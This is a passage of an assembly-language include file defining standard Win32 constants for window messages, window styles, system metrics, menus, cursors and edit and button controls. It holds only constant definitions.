DESKTOP_CREATEMENU equ 4h
DESKTOP_HOOKCONTROL equ 8h
DESKTOP_JOURNALRECORD equ 10h
DESKTOP_JOURNALPLAYBACK equ 20h
DESKTOP_ENUMERATE equ 40h
DESKTOP_WRITEOBJECTS equ 80h
WINSTA_ENUMDESKTOPS equ 1h
WINSTA_READATTRIBUTES equ 2h
WINSTA_ACCESSCLIPBOARD equ 4h
WINSTA_CREATEDESKTOP equ 8h
WINSTA_WRITEATTRIBUTES equ 10h
WINSTA_ACCESSPUBLICATOMS equ 20h
WINSTA_EXITWINDOWS equ 40h
WINSTA_ENUMERATE equ 100h
WINSTA_READSCREEN equ 200h
GWL_WNDPROC equ -4
GWL_HINSTANCE equ -6
GWL_HWNDPARENT equ -8
GWL_STYLE equ -16
GWL_EXSTYLE equ -20
GWL_USERDATA equ -21
GWL_ID equ -12
GCL_MENUNAME equ -8
GCL_HBRBACKGROUND equ -10
GCL_HCURSOR equ -12
GCL_HICON equ -14
GCL_HMODULE equ -16
GCL_CBWNDEXTRA equ -18
GCL_CBCLSEXTRA equ -20
GCL_WNDPROC equ -24
GCL_STYLE equ -26
GCW_ATOM equ -32
WM_USER equ 400h
WM_NULL equ 0h
WM_CREATE equ 1h
WM_DESTROY equ 2h
WM_MOVE equ 3h
WM_SIZE equ 5h
WM_ACTIVATE equ 6h
WA_INACTIVE equ 0
WA_ACTIVE equ 1
WA_CLICKACTIVE equ 2
WM_SETFOCUS equ 7h
WM_KILLFOCUS equ 08h
WM_ENABLE equ 0Ah
WM_SETREDRAW equ 0Bh
WM_SETTEXT equ 0Ch
WM_GETTEXT equ 0Dh
WM_GETTEXTLENGTH equ 0Eh
WM_PAINT equ 0Fh
WM_CLOSE equ 10h
WM_QUERYENDSESSION equ 11h
WM_QUIT equ 12h
WM_QUERYOPEN equ 13h
WM_ERASEBKGND equ 14h
WM_SYSCOLORCHANGE equ 15h
WM_ENDSESSION equ 16h
WM_SHOWWINDOW equ 18h
WM_WININICHANGE equ 1Ah
WM_DEVMODECHANGE equ 1Bh
WM_ACTIVATEAPP equ 1Ch
WM_FONTCHANGE equ 1Dh
WM_TIMECHANGE equ 1Eh
WM_CANCELMODE equ 1Fh
WM_SETCURSOR equ 20h
WM_MOUSEACTIVATE equ 21h
WM_CHILDACTIVATE equ 22h
WM_QUEUESYNC equ 23h
WM_GETMINMAXINFO equ 24h
WM_PAINTICON equ 26h
WM_ICONERASEBKGND equ 27h
WM_NEXTDLGCTL equ 28h
WM_SPOOLERSTATUS equ 2Ah
WM_DRAWITEM equ 2Bh
WM_MEASUREITEM equ 2Ch
WM_DELETEITEM equ 2Dh
WM_VKEYTOITEM equ 2Eh
WM_CHARTOITEM equ 2Fh
WM_SETFONT equ 30h
WM_GETFONT equ 31h
WM_SETHOTKEY equ 32h
WM_GETHOTKEY equ 33h
WM_QUERYDRAGICON equ 37h
WM_COMPAREITEM equ 39h
WM_COMPACTING equ 41h
WM_OTHERWINDOWCREATED equ 42h
WM_OTHERWINDOWDESTROYED equ 43h
WM_COMMNOTIFY equ 44h
CN_RECEIVE equ 1h
CN_TRANSMIT equ 2h
CN_EVENT equ 4h
WM_WINDOWPOSCHANGING equ 46h
WM_WINDOWPOSCHANGED equ 47h
WM_POWER equ 48h
PWR_OK equ 1
PWR_FAIL equ -1
PWR_SUSPENDREQUEST equ 1
PWR_SUSPENDRESUME equ 2
PWR_CRITICALRESUME equ 3
WM_COPYDATA equ 4Ah
WM_CANCELJOURNAL equ 4Bh
WM_NOTIFY equ 4Eh
WM_INPUTLANGUAGECHANGEREQUEST equ 50h
WM_INPUTLANGUAGECHANGE equ 51h
WM_TCARD equ 52h
WM_HELP equ 53h
WM_USERCHANGED equ 54h
WM_NOTIFYFORMAT equ 55h
WM_CONTEXTMENU equ 7Bh
WM_STYLECHANGING equ 7Ch
WM_STYLECHANGED equ 7Dh
WM_DISPLAYCHANGE equ 7Eh
WM_GETICON equ 7Fh
WM_SETICON equ 80h
WM_NCCREATE equ 81h
WM_NCDESTROY equ 82h
WM_NCCALCSIZE equ 83h
WM_NCHITTEST equ 84h
WM_NCPAINT equ 85h
WM_NCACTIVATE equ 86h
WM_GETDLGCODE equ 87h
WM_NCMOUSEMOVE equ 0A0h
WM_NCLBUTTONDOWN equ 0A1h
WM_NCLBUTTONUP equ 0A2h
WM_NCLBUTTONDBLCLK equ 0A3h
WM_NCRBUTTONDOWN equ 0A4h
WM_NCRBUTTONUP equ 0A5h
WM_NCRBUTTONDBLCLK equ 0A6h
WM_NCMBUTTONDOWN equ 0A7h
WM_NCMBUTTONUP equ 0A8h
WM_NCMBUTTONDBLCLK equ 0A9h
WM_KEYFIRST equ 100h
WM_KEYDOWN equ 100h
WM_KEYUP equ 101h
WM_CHAR equ 102h
WM_DEADCHAR equ 103h
WM_SYSKEYDOWN equ 104h
WM_SYSKEYUP equ 105h
WM_SYSCHAR equ 106h
WM_SYSDEADCHAR equ 107h
WM_KEYLAST equ 108h
WM_INITDIALOG equ 110h
WM_COMMAND equ 111h
WM_SYSCOMMAND equ 112h
WM_TIMER equ 113h
WM_HSCROLL equ 114h
WM_VSCROLL equ 115h
WM_INITMENU equ 116h
WM_INITMENUPOPUP equ 117h
WM_MENUSELECT equ 11Fh
WM_MENUCHAR equ 120h
WM_ENTERIDLE equ 121h
WM_CTLCOLORMSGBOX equ 132h
WM_CTLCOLOREDIT equ 133h
WM_CTLCOLORLISTBOX equ 134h
WM_CTLCOLORBTN equ 135h
WM_CTLCOLORDLG equ 136h
WM_CTLCOLORSCROLLBAR equ 137h
WM_CTLCOLORSTATIC equ 138h
WM_MOUSEFIRST equ 200h
WM_MOUSEMOVE equ 200h
WM_LBUTTONDOWN equ 201h
WM_LBUTTONUP equ 202h
WM_LBUTTONDBLCLK equ 203h
WM_RBUTTONDOWN equ 204h
WM_RBUTTONUP equ 205h
WM_RBUTTONDBLCLK equ 206h
WM_MBUTTONDOWN equ 207h
WM_MBUTTONUP equ 208h
WM_MBUTTONDBLCLK equ 209h
WM_MOUSELAST equ 209h
WM_PARENTNOTIFY equ 210h
WM_ENTERMENULOOP equ 211h
WM_EXITMENULOOP equ 212h
WM_MDICREATE equ 220h
WM_MDIDESTROY equ 221h
WM_MDIACTIVATE equ 222h
WM_MDIRESTORE equ 223h
WM_MDINEXT equ 224h
WM_MDIMAXIMIZE equ 225h
WM_MDITILE equ 226h
WM_MDICASCADE equ 227h
WM_MDIICONARRANGE equ 228h
WM_MDIGETACTIVE equ 229h
WM_MDISETMENU equ 230h
WM_DROPFILES equ 233h
WM_MDIREFRESHMENU equ 234h
WM_CUT equ 300h
WM_COPY equ 301h
WM_PASTE equ 302h
WM_CLEAR equ 303h
WM_UNDO equ 304h
WM_RENDERFORMAT equ 305h
WM_RENDERALLFORMATS equ 306h
WM_DESTROYCLIPBOARD equ 307h
WM_DRAWCLIPBOARD equ 308h
WM_PAINTCLIPBOARD equ 309h
WM_VSCROLLCLIPBOARD equ 30Ah
WM_SIZECLIPBOARD equ 30Bh
WM_ASKCBFORMATNAME equ 30Ch
WM_CHANGECBCHAIN equ 30Dh
WM_HSCROLLCLIPBOARD equ 30Eh
WM_QUERYNEWPALETTE equ 30Fh
WM_PALETTEISCHANGING equ 310h
WM_PALETTECHANGED equ 311h
WM_HOTKEY equ 312h
WM_PRINTCLIENT equ 318h
WM_PENWINFIRST equ 380h
WM_PENWINLAST equ 38Fh
ST_BEGINSWP equ 0
ST_ENDSWP equ 1
HTERROR equ -2
HTTRANSPARENT equ -1
HTNOWHERE equ 0
HTCLIENT equ 1
HTCAPTION equ 2
HTSYSMENU equ 3
HTGROWBOX equ 4
HTSIZE equ HTGROWBOX
HTMENU equ 5
HTHSCROLL equ 6
HTVSCROLL equ 7
HTMINBUTTON equ 8
HTMAXBUTTON equ 9
HTLEFT equ 10
HTRIGHT equ 11
HTTOP equ 12
HTTOPLEFT equ 13
HTTOPRIGHT equ 14
HTBOTTOM equ 15
HTBOTTOMLEFT equ 16
HTBOTTOMRIGHT equ 17
HTBORDER equ 18
HTREDUCE equ HTMINBUTTON
HTZOOM equ HTMAXBUTTON
HTSIZEFIRST equ HTLEFT
HTSIZELAST equ HTBOTTOMRIGHT
SMTO_NORMAL equ 0h
SMTO_BLOCK equ 1h
SMTO_ABORTIFHUNG equ 2h
MA_ACTIVATE equ 1
MA_ACTIVATEANDEAT equ 2
MA_NOACTIVATE equ 3
MA_NOACTIVATEANDEAT equ 4
SIZE_RESTORED equ 0
SIZE_MINIMIZED equ 1
SIZE_MAXIMIZED equ 2
SIZE_MAXSHOW equ 3
SIZE_MAXHIDE equ 4
SIZENORMAL equ SIZE_RESTORED
SIZEICONIC equ SIZE_MINIMIZED
SIZEFULLSCREEN equ SIZE_MAXIMIZED
SIZEZOOMSHOW equ SIZE_MAXSHOW
SIZEZOOMHIDE equ SIZE_MAXHIDE
WVR_ALIGNTOP equ 10h
WVR_ALIGNLEFT equ 20h
WVR_ALIGNBOTTOM equ 40h
WVR_ALIGNRIGHT equ 80h
WVR_HREDRAW equ 100h
WVR_VREDRAW equ 200h
WVR_REDRAW equ WVR_HREDRAW|WVR_VREDRAW
WVR_VALIDRECTS equ 400h
MK_LBUTTON equ 1h
MK_RBUTTON equ 2h
MK_SHIFT equ 4h
MK_CONTROL equ 8h
MK_MBUTTON equ 10h
WS_OVERLAPPED equ 0h
WS_POPUP equ 80000000h
WS_CHILD equ 40000000h
WS_MINIMIZE equ 20000000h
WS_VISIBLE equ 10000000h
WS_DISABLED equ 8000000h
WS_CLIPSIBLINGS equ 4000000h
WS_CLIPCHILDREN equ 2000000h
WS_MAXIMIZE equ 1000000h
WS_CAPTION equ 0C00000h
WS_BORDER equ 800000h
WS_DLGFRAME equ 400000h
WS_VSCROLL equ 200000h
WS_HSCROLL equ 100000h
WS_SYSMENU equ 80000h
WS_THICKFRAME equ 40000h
WS_GROUP equ 20000h
WS_TABSTOP equ 10000h
WS_MINIMIZEBOX equ 20000h
WS_MAXIMIZEBOX equ 10000h
WS_TILED equ WS_OVERLAPPED
WS_ICONIC equ WS_MINIMIZE
WS_SIZEBOX equ WS_THICKFRAME
WS_OVERLAPPEDWINDOW equ WS_OVERLAPPED|WS_CAPTION|WS_SYSMENU|WS_THICKFRAME|WS_MINIMIZEBOX|
WS_MAXIMIZEBOX
WS_TILEDWINDOW equ WS_OVERLAPPEDWINDOW
WS_POPUPWINDOW equ WS_POPUP|WS_BORDER|WS_SYSMENU
WS_CHILDWINDOW equ WS_CHILD
WS_EX_DLGMODALFRAME equ 1h
WS_EX_NOPARENTNOTIFY equ 4h
WS_EX_TOPMOST equ 8h
WS_EX_ACCEPTFILES equ 10h
WS_EX_TRANSPARENT equ 20h
WS_EX_MDICHILD equ 00000040h
WS_EX_TOOLWINDOW equ 00000080h
WS_EX_WINDOWEDGE equ 00000100h
WS_EX_CLIENTEDGE equ 00000200h
WS_EX_CONTEXTHELP equ 00000400h
WS_EX_RIGHT equ 00001000h
WS_EX_LEFT equ 00000000h
WS_EX_RTLREADING equ 00002000h
WS_EX_LTRREADING equ 00000000h
WS_EX_LEFTSCROLLBAR equ 00004000h
WS_EX_RIGHTSCROLLBAR equ 00000000h
WS_EX_CONTROLPARENT equ 00010000h
WS_EX_STATICEDGE equ 00020000h
WS_EX_APPWINDOW equ 00040000h
WS_EX_OVERLAPPEDWINDOW equ WS_EX_WINDOWEDGE|WS_EX_CLIENTEDGE
WS_EX_PALETTEWINDOW equ WS_EX_WINDOWEDGE|WS_EX_TOOLWINDOW|WS_EX_TOPMOST
CS_VREDRAW equ 1h
CS_HREDRAW equ 2h
CS_KEYCVTWINDOW equ 4h
CS_DBLCLKS equ 8h
CS_OWNDC equ 20h
CS_CLASSDC equ 40h
CS_PARENTDC equ 80h
CS_NOKEYCVT equ 100h
CS_NOCLOSE equ 200h
CS_SAVEBITS equ 800h
CS_BYTEALIGNCLIENT equ 1000h
CS_BYTEALIGNWINDOW equ 2000h
CS_PUBLICCLASS equ 4000h
CS_GLOBALCLASS equ CS_PUBLICCLASS
CF_TEXT equ 1
CF_BITMAP equ 2
CF_METAFILEPICT equ 3
CF_SYLK equ 4
CF_DIF equ 5
CF_TIFF equ 6
CF_OEMTEXT equ 7
CF_DIB equ 8
CF_PALETTE equ 9
CF_PENDATA equ 10
CF_RIFF equ 11
CF_WAVE equ 12
CF_OWNERDISPLAY equ 80h
CF_DSPTEXT equ 81h
CF_DSPBITMAP equ 82h
CF_DSPMETAFILEPICT equ 83h
CF_DSPENHMETAFILE equ 8Eh
CF_PRIVATEFIRST equ 200h
CF_PRIVATELAST equ 2FFh
CF_GDIOBJFIRST equ 300h
CF_GDIOBJLAST equ 3FFh
FVIRTKEY equ 1h
FNOINVERT equ 2h
FSHIFT equ 4h
FCONTROL equ 8h
FALT equ 10h
WPF_SETMINPOSITION equ 1h
WPF_RESTORETOMAXIMIZED equ 2h
ODT_MENU equ 1
ODT_LISTBOX equ 2
ODT_COMBOBOX equ 3
ODT_BUTTON equ 4
ODA_DRAWENTIRE equ 1h
ODA_SELECT equ 2h
ODA_FOCUS equ 4h
ODS_SELECTED equ 1h
ODS_GRAYED equ 2h
ODS_DISABLED equ 4h
ODS_CHECKED equ 8h
ODS_FOCUS equ 10h
PM_NOREMOVE equ 0h
PM_REMOVE equ 1h
PM_NOYIELD equ 2h
MOD_ALT equ 1h
MOD_CONTROL equ 2h
MOD_SHIFT equ 4h
IDHOT_SNAPWINDOW equ -1
IDHOT_SNAPDESKTOP equ -2
EWX_LOGOFF equ 0
EWX_SHUTDOWN equ 1
EWX_REBOOT equ 2
EWX_FORCE equ 4
EW_RESTARTWINDOWS equ 42h
READAPI equ 0
WRITEAPI equ 1
READ_WRITE equ 2
HWND_BROADCAST equ 0FFFFh
CW_USEDEFAULT equ 80000000h
HWND_DESKTOP equ 0
SWP_NOSIZE equ 1h
SWP_NOMOVE equ 2h
SWP_NOZORDER equ 4h
SWP_NOREDRAW equ 8h
SWP_NOACTIVATE equ 10h
SWP_FRAMECHANGED equ 20h
SWP_SHOWWINDOW equ 40h
SWP_HIDEWINDOW equ 80h
SWP_NOCOPYBITS equ 100h
SWP_NOOWNERZORDER equ 200h
SWP_DRAWFRAME equ SWP_FRAMECHANGED
SWP_NOREPOSITION equ SWP_NOOWNERZORDER
HWND_TOP equ 0
HWND_BOTTOM equ 1
HWND_TOPMOST equ -1
HWND_NOTOPMOST equ -2
DLGWINDOWEXTRA equ 30
KEYEVENTF_EXTENDEDKEY equ 1h
KEYEVENTF_KEYUP equ 2h
MOUSEEVENTF_MOVE equ 1h
MOUSEEVENTF_LEFTDOWN equ 2h
MOUSEEVENTF_LEFTUP equ 4h
MOUSEEVENTF_RIGHTDOWN equ 8h
MOUSEEVENTF_RIGHTUP equ 10h
MOUSEEVENTF_MIDDLEDOWN equ 20h
MOUSEEVENTF_MIDDLEUP equ 40h
MOUSEEVENTF_ABSOLUTE equ 8000h
QS_KEY equ 1h
QS_MOUSEMOVE equ 2h
QS_MOUSEBUTTON equ 4h
QS_POSTMESSAGE equ 8h
QS_TIMER equ 10h
QS_PAINT equ 20h
QS_SENDMESSAGE equ 40h
QS_HOTKEY equ 80h
QS_MOUSE equ QS_MOUSEMOVE|QS_MOUSEBUTTON
QS_INPUT equ QS_MOUSE|QS_KEY
QS_ALLEVENTS equ QS_INPUT|QS_POSTMESSAGE|QS_TIMER|QS_PAINT|QS_HOTKEY
QS_ALLINPUT equ QS_SENDMESSAGE|QS_PAINT|QS_TIMER|QS_POSTMESSAGE|QS_MOUSEBUTTON|QS_MOUSEMOVE|QS_HOTKEY|QS_KEY
SM_CXSCREEN equ 0
SM_CYSCREEN equ 1
SM_CXVSCROLL equ 2
SM_CYHSCROLL equ 3
SM_CYCAPTION equ 4
SM_CXBORDER equ 5
SM_CYBORDER equ 6
SM_CXDLGFRAME equ 7
SM_CYDLGFRAME equ 8
SM_CYVTHUMB equ 9
SM_CXHTHUMB equ 10
SM_CXICON equ 11
SM_CYICON equ 12
SM_CXCURSOR equ 13
SM_CYCURSOR equ 14
SM_CYMENU equ 15
SM_CXFULLSCREEN equ 16
SM_CYFULLSCREEN equ 17
SM_CYKANJIWINDOW equ 18
SM_MOUSEPRESENT equ 19
SM_CYVSCROLL equ 20
SM_CXHSCROLL equ 21
SM_DEBUG equ 22
SM_SWAPBUTTON equ 23
SM_RESERVED1 equ 24
SM_RESERVED2 equ 25
SM_RESERVED3 equ 26
SM_RESERVED4 equ 27
SM_CXMIN equ 28
SM_CYMIN equ 29
SM_CXSIZE equ 30
SM_CYSIZE equ 31
SM_CXFRAME equ 32
SM_CYFRAME equ 33
SM_CXMINTRACK equ 34
SM_CYMINTRACK equ 35
SM_CXDOUBLECLK equ 36
SM_CYDOUBLECLK equ 37
SM_CXICONSPACING equ 38
SM_CYICONSPACING equ 39
SM_MENUDROPALIGNMENT equ 40
SM_PENWINDOWS equ 41
SM_DBCSENABLED equ 42
SM_CMOUSEBUTTONS equ 43
SM_CXFIXEDFRAME equ SM_CXDLGFRAME
SM_CYFIXEDFRAME equ SM_CYDLGFRAME
SM_CXSIZEFRAME equ SM_CXFRAME
SM_CYSIZEFRAME equ SM_CYFRAME
SM_SECURE equ 44
SM_CXEDGE equ 45
SM_CYEDGE equ 46
SM_CXMINSPACING equ 47
SM_CYMINSPACING equ 48
SM_CXSMICON equ 49
SM_CYSMICON equ 50
SM_CYSMCAPTION equ 51
SM_CXSMSIZE equ 52
SM_CYSMSIZE equ 53
SM_CXMENUSIZE equ 54
SM_CYMENUSIZE equ 55
SM_ARRANGE equ 56
SM_CXMINIMIZED equ 57
SM_CYMINIMIZED equ 58
SM_CXMAXTRACK equ 59
SM_CYMAXTRACK equ 60
SM_CXMAXIMIZED equ 61
SM_CYMAXIMIZED equ 62
SM_NETWORK equ 63
SM_CLEANBOOT equ 67
SM_CXDRAG equ 68
SM_CYDRAG equ 69
SM_SHOWSOUNDS equ 70
SM_CXMENUCHECK equ 71
SM_CYMENUCHECK equ 72
SM_SLOWMACHINE equ 73
SM_MIDEASTENABLED equ 74
SM_CMETRICS equ 75
TPM_LEFTBUTTON equ 0h
TPM_RIGHTBUTTON equ 2h
TPM_LEFTALIGN equ 0h
TPM_CENTERALIGN equ 4h
TPM_RIGHTALIGN equ 8h
DT_TOP equ 0h
DT_LEFT equ 0h
DT_CENTER equ 1h
DT_RIGHT equ 2h
DT_VCENTER equ 4h
DT_BOTTOM equ 8h
DT_WORDBREAK equ 10h
DT_SINGLELINE equ 20h
DT_EXPANDTABS equ 40h
DT_TABSTOP equ 80h
DT_NOCLIP equ 100h
DT_EXTERNALLEADING equ 200h
DT_CALCRECT equ 400h
DT_NOPREFIX equ 800h
DT_INTERNAL equ 1000h
DCX_WINDOW equ 1h
DCX_CACHE equ 2h
DCX_NORESETATTRS equ 4h
DCX_CLIPCHILDREN equ 8h
DCX_CLIPSIBLINGS equ 10h
DCX_PARENTCLIP equ 20h
DCX_EXCLUDERGN equ 40h
DCX_INTERSECTRGN equ 80h
DCX_EXCLUDEUPDATE equ 100h
DCX_INTERSECTUPDATE equ 200h
DCX_LOCKWINDOWUPDATE equ 400h
DCX_NORECOMPUTE equ 100000h
DCX_VALIDATE equ 200000h
RDW_INVALIDATE equ 1h
RDW_INTERNALPAINT equ 2h
RDW_ERASE equ 4h
RDW_VALIDATE equ 8h
RDW_NOINTERNALPAINT equ 10h
RDW_NOERASE equ 20h
RDW_NOCHILDREN equ 40h
RDW_ALLCHILDREN equ 80h
RDW_UPDATENOW equ 100h
RDW_ERASENOW equ 200h
RDW_FRAME equ 400h
RDW_NOFRAME equ 800h
SW_SCROLLCHILDREN equ 1h
SW_INVALIDATE equ 2h
SW_ERASE equ 4h
ESB_ENABLE_BOTH equ 0h
ESB_DISABLE_BOTH equ 3h
ESB_DISABLE_LEFT equ 1h
ESB_DISABLE_RIGHT equ 2h
ESB_DISABLE_UP equ 1h
ESB_DISABLE_DOWN equ 2h
ESB_DISABLE_LTUP equ ESB_DISABLE_LEFT
ESB_DISABLE_RTDN equ ESB_DISABLE_RIGHT
MB_OK equ 0h
MB_OKCANCEL equ 1h
MB_ABORTRETRYIGNORE equ 2h
MB_YESNOCANCEL equ 3h
MB_YESNO equ 4h
MB_RETRYCANCEL equ 5h
MB_ICONHAND equ 10h
MB_ICONQUESTION equ 20h
MB_ICONEXCLAMATION equ 30h
MB_ICONASTERISK equ 40h
MB_ICONERROR equ MB_ICONHAND
MB_ICONINFORMATION equ MB_ICONASTERISK
MB_ICONSTOP equ MB_ICONHAND
MB_ICONWARNING equ MB_ICONEXCLAMATION
MB_DEFBUTTON1 equ 0h
MB_DEFBUTTON2 equ 100h
MB_DEFBUTTON3 equ 200h
MB_APPLMODAL equ 0h
MB_SYSTEMMODAL equ 1000h
MB_TASKMODAL equ 2000h
MB_NOFOCUS equ 8000h
MB_SETFOREGROUND equ 10000h
MB_DEFAULT_DESKTOP_ONLY equ 20000h
MB_TYPEMASK equ 0Fh
MB_ICONMASK equ 0F0h
MB_DEFMASK equ 0F00h
MB_MODEMASK equ 3000h
MB_MISCMASK equ 0C000h
CTLCOLOR_MSGBOX equ 0
CTLCOLOR_EDIT equ 1
CTLCOLOR_LISTBOX equ 2
CTLCOLOR_BTN equ 3
CTLCOLOR_DLG equ 4
CTLCOLOR_SCROLLBAR equ 5
CTLCOLOR_STATIC equ 6
CTLCOLOR_MAX equ 8
COLOR_SCROLLBAR equ 0
COLOR_BACKGROUND equ 1
COLOR_ACTIVECAPTION equ 2
COLOR_INACTIVECAPTION equ 3
COLOR_MENU equ 4
COLOR_WINDOW equ 5
COLOR_WINDOWFRAME equ 6
COLOR_MENUTEXT equ 7
COLOR_WINDOWTEXT equ 8
COLOR_CAPTIONTEXT equ 9
COLOR_ACTIVEBORDER equ 10
COLOR_INACTIVEBORDER equ 11
COLOR_APPWORKSPACE equ 12
COLOR_HIGHLIGHT equ 13
COLOR_HIGHLIGHTTEXT equ 14
COLOR_BTNFACE equ 15
COLOR_BTNSHADOW equ 16
COLOR_GRAYTEXT equ 17
COLOR_BTNTEXT equ 18
COLOR_INACTIVECAPTIONTEXT equ 19
COLOR_BTNHIGHLIGHT equ 20
COLOR_3DDKSHADOW equ 21
COLOR_3DLIGHT equ 22
COLOR_INFOTEXT equ 23
COLOR_INFOBK equ 24
COLOR_DESKTOP equ COLOR_BACKGROUND
COLOR_3DFACE equ COLOR_BTNFACE
COLOR_3DSHADOW equ COLOR_BTNSHADOW
COLOR_3DHIGHLIGHT equ COLOR_BTNHIGHLIGHT
COLOR_3DHILIGHT equ COLOR_BTNHIGHLIGHT
COLOR_BTNHILIGHT equ COLOR_BTNHIGHLIGHT
GW_HWNDFIRST equ 0
GW_HWNDLAST equ 1
GW_HWNDNEXT equ 2
GW_HWNDPREV equ 3
GW_OWNER equ 4
GW_CHILD equ 5
GW_MAX equ 5
MF_INSERT equ 0h
MF_CHANGE equ 80h
MF_APPEND equ 100h
MF_DELETE equ 200h
MF_REMOVE equ 1000h
MF_BYCOMMAND equ 0h
MF_BYPOSITION equ 400h
MF_SEPARATOR equ 800h
MF_ENABLED equ 0h
MF_GRAYED equ 1h
MF_DISABLED equ 2h
MF_UNCHECKED equ 0h
MF_CHECKED equ 8h
MF_USECHECKBITMAPS equ 200h
MF_STRING equ 0h
MF_BITMAP equ 4h
MF_OWNERDRAW equ 100h
MF_POPUP equ 10h
MF_MENUBARBREAK equ 20h
MF_MENUBREAK equ 40h
MF_UNHILITE equ 0h
MF_HILITE equ 80h
MF_SYSMENU equ 2000h
MF_HELP equ 4000h
MF_MOUSESELECT equ 8000h
MF_END equ 80h
SC_SIZE equ 0F000h
SC_MOVE equ 0F010h
SC_MINIMIZE equ 0F020h
SC_MAXIMIZE equ 0F030h
SC_NEXTWINDOW equ 0F040h
SC_PREVWINDOW equ 0F050h
SC_CLOSE equ 0F060h
SC_VSCROLL equ 0F070h
SC_HSCROLL equ 0F080h
SC_MOUSEMENU equ 0F090h
SC_KEYMENU equ 0F100h
SC_ARRANGE equ 0F110h
SC_RESTORE equ 0F120h
SC_TASKLIST equ 0F130h
SC_SCREENSAVE equ 0F140h
SC_HOTKEY equ 0F150h
SC_ICON equ SC_MINIMIZE
SC_ZOOM equ SC_MAXIMIZE
IDC_ARROW equ 32512
IDC_IBEAM equ 32513
IDC_WAIT equ 32514
IDC_CROSS equ 32515
IDC_UPARROW equ 32516
IDC_SIZE equ 32640
IDC_ICON equ 32641
IDC_SIZENWSE equ 32642
IDC_SIZENESW equ 32643
IDC_SIZEWE equ 32644
IDC_SIZENS equ 32645
IDC_SIZEALL equ 32646
IDC_NO equ 32648
IDC_APPSTARTING equ 32650
OBM_CLOSE equ 32754
OBM_UPARROW equ 32753
OBM_DNARROW equ 32752
OBM_RGARROW equ 32751
OBM_LFARROW equ 32750
OBM_REDUCE equ 32749
OBM_ZOOM equ 32748
OBM_RESTORE equ 32747
OBM_REDUCED equ 32746
OBM_ZOOMD equ 32745
OBM_RESTORED equ 32744
OBM_UPARROWD equ 32743
OBM_DNARROWD equ 32742
OBM_RGARROWD equ 32741
OBM_LFARROWD equ 32740
OBM_MNARROW equ 32739
OBM_COMBO equ 32738
OBM_UPARROWI equ 32737
OBM_DNARROWI equ 32736
OBM_RGARROWI equ 32735
OBM_LFARROWI equ 32734
OBM_OLD_CLOSE equ 32767
OBM_SIZE equ 32766
OBM_OLD_UPARROW equ 32765
OBM_OLD_DNARROW equ 32764
OBM_OLD_RGARROW equ 32763
OBM_OLD_LFARROW equ 32762
OBM_BTSIZE equ 32761
OBM_CHECK equ 32760
OBM_CHECKBOXES equ 32759
OBM_BTNCORNERS equ 32758
OBM_OLD_REDUCE equ 32757
OBM_OLD_ZOOM equ 32756
OBM_OLD_RESTORE equ 32755
OCR_NORMAL equ 32512
OCR_IBEAM equ 32513
OCR_WAIT equ 32514
OCR_CROSS equ 32515
OCR_UP equ 32516
OCR_SIZE equ 32640
OCR_ICON equ 32641
OCR_SIZENWSE equ 32642
OCR_SIZENESW equ 32643
OCR_SIZEWE equ 32644
OCR_SIZENS equ 32645
OCR_SIZEALL equ 32646
OCR_ICOCUR equ 32647
OCR_NO equ 32648
OIC_SAMPLE equ 32512
OIC_HAND equ 32513
OIC_QUES equ 32514
OIC_BANG equ 32515
OIC_NOTE equ 32516
ORD_LANGDRIVER equ 1
IDI_APPLICATION equ 32512
IDI_HAND equ 32513
IDI_QUESTION equ 32514
IDI_EXCLAMATION equ 32515
IDI_ASTERISK equ 32516
IDOK equ 1
IDCANCEL equ 2
IDABORT equ 3
IDRETRY equ 4
IDIGNORE equ 5
IDYES equ 6
IDNO equ 7
ES_LEFT equ 0h
ES_CENTER equ 1h
ES_RIGHT equ 2h
ES_MULTILINE equ 4h
ES_UPPERCASE equ 8h
ES_LOWERCASE equ 10h
ES_PASSWORD equ 20h
ES_AUTOVSCROLL equ 40h
ES_AUTOHSCROLL equ 80h
ES_NOHIDESEL equ 100h
ES_OEMCONVERT equ 400h
ES_READONLY equ 800h
ES_WANTRETURN equ 1000h
EN_SETFOCUS equ 100h
EN_KILLFOCUS equ 200h
EN_CHANGE equ 300h
EN_UPDATE equ 400h
EN_ERRSPACE equ 500h
EN_MAXTEXT equ 501h
EN_HSCROLL equ 601h
EN_VSCROLL equ 602h
EM_GETSEL equ 0B0h
EM_SETSEL equ 0B1h
EM_GETRECT equ 0B2h
EM_SETRECT equ 0B3h
EM_SETRECTNP equ 0B4h
EM_SCROLL equ 0B5h
EM_LINESCROLL equ 0B6h
EM_SCROLLCARET equ 0B7h
EM_GETMODIFY equ 0B8h
EM_SETMODIFY equ 0B9h
EM_GETLINECOUNT equ 0BAh
EM_LINEINDEX equ 0BBh
EM_SETHANDLE equ 0BCh
EM_GETHANDLE equ 0BDh
EM_GETTHUMB equ 0BEh
EM_LINELENGTH equ 0C1h
EM_REPLACESEL equ 0C2h
EM_GETLINE equ 0C4h
EM_LIMITTEXT equ 0C5h
EM_CANUNDO equ 0C6h
EM_UNDO equ 0C7h
EM_FMTLINES equ 0C8h
EM_LINEFROMCHAR equ 0C9h
EM_SETTABSTOPS equ 0CBh
EM_SETPASSWORDCHAR equ 0CCh
EM_EMPTYUNDOBUFFER equ 0CDh
EM_GETFIRSTVISIBLELINE equ 0CEh
EM_SETREADONLY equ 0CFh
EM_SETWORDBREAKPROC equ 0D0h
EM_GETWORDBREAKPROC equ 0D1h
EM_GETPASSWORDCHAR equ 0D2h
EM_SETMARGINS equ 0D3h
EM_GETMARGINS equ 0D4h
EM_SETLIMITTEXT equ EM_LIMITTEXT
EM_GETLIMITTEXT equ 0D5h
EM_POSFROMCHAR equ 0D6h
EM_CHARFROMPOS equ 0D7h
WB_LEFT equ 0
WB_RIGHT equ 1
WB_ISDELIMITER equ 2
BS_PUSHBUTTON equ 0h
BS_DEFPUSHBUTTON equ 1h
BS_CHECKBOX equ 2h
BS_AUTOCHECKBOX equ 3h
BS_RADIOBUTTON equ 4h
BS_3STATE equ 5h
BS_AUTO3STATE equ 6h
BS_GROUPBOX equ 7h
BS_USERBUTTON equ 8h
BS_AUTORADIOBUTTON equ 9h
BS_OWNERDRAW equ 0Bh
BS_LEFTTEXT equ 20h
BS_BITMAP equ 80h
BS_ICON equ 40h
BN_CLICKED equ 0
BN_PAINT equ 1
BN_HILITE equ 2
BN_UNHILITE equ 3
BN_DISABLE equ 4
BN_DOUBLECLICKED equ 5
BN_SETFOCUS equ 6
BN_KILLFOCUS equ 7
BST_UNCHECKED equ 00h
BST_CHECKED equ 01h
BST_INDETERMINATE equ 02h
BST_PUSHED equ 04h
BM_GETCHECK equ 0F0h
BM_SETCHECK equ 0F1h
